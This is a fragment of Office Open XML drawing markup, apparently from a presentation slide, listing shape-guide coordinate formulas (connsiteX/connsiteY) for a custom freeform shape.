              <a:gd name="connsiteY141" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY145" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY146" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY149" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY150" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY151" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY15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52962 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4750867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51669 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4750867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46936 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4750867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880 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 243397 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6372381 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY145" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY146" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY149" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY150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880 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 672277 w 1508539"/>
